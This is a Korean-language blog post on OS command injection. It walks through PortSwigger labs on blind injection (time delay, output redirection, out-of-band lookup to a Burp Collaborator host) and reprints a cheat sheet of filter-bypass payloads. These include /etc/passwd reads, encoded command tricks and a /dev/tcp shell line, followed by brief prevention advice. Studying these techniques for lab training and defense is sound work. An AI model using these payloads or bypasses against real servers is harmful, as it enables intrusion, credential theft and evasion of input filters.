🔎 What is OS command injection?

OS command injection은 공격자가 응용 프로그램을 실행하는 서버에서 임의의 운영체재(OS) 명령을 실행할 수 있게하는 웹 취약점으로 일반적으로 응용 프로그램과 모든 데이터를 완전히 손상 시킬 수 있습니다. 종종 공격자는 OS Command injection을 활용하여 호스팅 인프라의 다른 부분을 손상시키고 신뢰 관계를 악용하여 조직내의 다른 시스템으로 공격으로 pivot 할 수 있습니다.

스크린샷 2021-11-21 오후 11 26 31

LAB

Blind OS command injection with 시간 딜레이

OS 커맨드 인젝션은 주로 블라인드 취약점 입니다.
즉 HTTP의 응답값에서 명령의 출력을 반환하지 않지만 명령어가 입력될 수 있어 Response time을 보고 체크하면 실제 명령이 수행되었는지 확인 할 수 있습니다.

사용자가 사이트에 대한 피드백을 제출할 수 있는 웹 사이트를 확인.

시간지연을 사용하는 ping 명령어 사용

||ping -c 10 127.0.0.1||

blind_command1

blind_command2 이메일 주소 파라미터 입력값에 페이로드 입력

HTTP 응답값이 10초뒤에 반응하여 os command injection에 취약한것을 확인할 수 있습니다.

Blind OS command injection with 입출력 재지정

명령의 출력은 응답값으로 반환되지 않지만 출력 리다이렉션을 통해 쓰기 가능한 폴더가 있다면 명령의 출력을 캡쳐할 수 있습니다.

/var/www/imgaes/ 가 쓰기 가능한 폴더라고 해보겠습니다.
앱은 이 위치에서 filename 파라미터로 제품 카탈로그에 대한 이미지를 제공합니다. 주입된 명령의 출력을 이 폴더의 파일로 리다이렉션한 다음 filename 파라미터 URL을 사용하여 파일의 내용을 검색할 수 있습니다.

|| whoami > /var/www/images/output.txt ||

email 파라미터에 인젝션 페이로드 입력

blind_command5 피드백이 정상적으로 입력됨

상품을 클릭하여 요청되는 파라미터 filename을 생성하였던 output.txt로 변경

blind_command6

blind_command7 output.txt로 파일명 변경

응답값 결과로 whoami 의 명령 입력값이 출력되는것을 확인할 수 있습니다.

Blind OS command injection with OOB

해당 취약점에서는 Burp의 collaborator 기능을 사용한 취약점입니다.

https://portswigger.net/burp/documentation/collaborator

burp의 collaborator 를 이용하여 URL 생성, copy to clipboard 클릭시 URL 복사 가능

스크린샷 2021-11-04 오후 2 18 26

메일 파라미터에 whoami 명령어의 페이로드를 입력

|| nslookup+`whoami`.jobolcvuvj39tty0zrncfkzlpcv4jt.burpcollaborator.net ||

스크린샷 2021-11-04 오후 2 23 12

poll now 클릭 또는 잠시 기다리면 생성되는 결과값에서 whoami 명령이 실행된것을 확인가능 합니다.
collaborator 를 사용하지 않으면 해당 명령어를 입력해도 결과값을 받아 볼 수 없지만 해당 기능을 사용함으로써 결과값을 확인 가능 합니다

스크린샷 2021-11-04 오후 2 23 38

🔥 Cheat sheet

Chaining commands

original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
original_cmd_by_server || ls   # Only if the first cmd fail

Bypass without space (Linux)

//Works on Linux only
swissky@crashlab:~/Www$ cat</etc/passwd
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ {cat,/etc/passwd}
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ cat$IFS/etc/passwd
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
RCE
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ X=$'uname\x20-a'&&$X
Linux crashlab 4.4.X-XX-generic #72-Ubuntu

swissky@crashlab:~$ sh</dev/tcp/127.0.0.1/4242

//Commands execution without spaces, $ or { } - Linux (Bash only)
IFS=,;`cat<<<uname,-a`

Bypass without space (Windows)

//Works on Windows only
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP

Bypass with a line return

something%0Acat%20/etc/passwd

Bypass characters filter via hex encoding (Linux)

swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd

swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd

swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd

swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash

Bypass characters filter

//Commands execution without backslash and slash - linux bash
swissky@crashlab:~$ echo ${HOME:0:1}
/

swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/

swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/

swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash

Bypass Blacklisted words

//Bypass with single quote
w'h'o'am'i

//Bypass with double quote
w"h"o"am"i

//Bypass with backslash and slash
w\ho\am\i
/\b\i\n/////s\h

//Bypass with $@
who$@ami

echo $0
-> /usr/bin/zsh
echo whoami|$0

//Bypass with variable expansion
/???/??t /???/p??s??

test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}

//Bypass with wildcards
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc

👀 How to Prevent ?

애플리케이션이 운영체제로부터 어떤 명령어를 직접적으로 호출하지 못하도록 차단 필요
사용자가 입력한 데이터가 운영체제 명령어 해석기에 전달되는 부분이 있는 경우 화이트리스트 방식으로 제한 필요
입력값에 대한 파라미터 데이터의 특수문자 필터링 처리
개발 시 운영체제 명령어 사용 가능한 함수를 사용하지 않아야 하며, 꼭 필요한 경우 화이트 리스트 방식으로 명령어 입력에 대한 검증 로직이 필요

언어	함수
asp	eval(), execute() 등
php	exec(), system(), passthru(), eval() 등
java	system.*(system.Runtime) 등

📃 References

PortSwigger OS command injection

OS command injection

🔎 What is OS command injection?

LAB

🔥 Cheat sheet

Chaining commands

Bypass without space (Linux)

Bypass without space (Windows)

Bypass with a line return

Bypass characters filter via hex encoding (Linux)

Bypass characters filter

Bypass Blacklisted words

👀 How to Prevent ?

📃 References

Server-side Request Forgery(SSRF)

Directory traversal & LFI,RFI

IP 대역 분할 표

Bypass NAC

AWS Cheat Sheet

Latest Posts

Web3 자료 모음

토큰기반 인증에서 bearer 란?

OS command injection

🔎 What is OS command injection?

LAB

🔥 Cheat sheet

Chaining commands

Bypass without space (Linux)

Bypass without space (Windows)

Bypass with a line return

Bypass characters filter via hex encoding (Linux)

Bypass characters filter

Bypass Blacklisted words

👀 How to Prevent ?

📃 References

Server-side Request Forgery(SSRF)

Directory traversal & LFI,RFI

You may also like

IP 대역 분할 표

Bypass NAC

AWS Cheat Sheet

Latest Posts

Web3 자료 모음

토큰기반 인증에서 bearer 란?

Explore Tags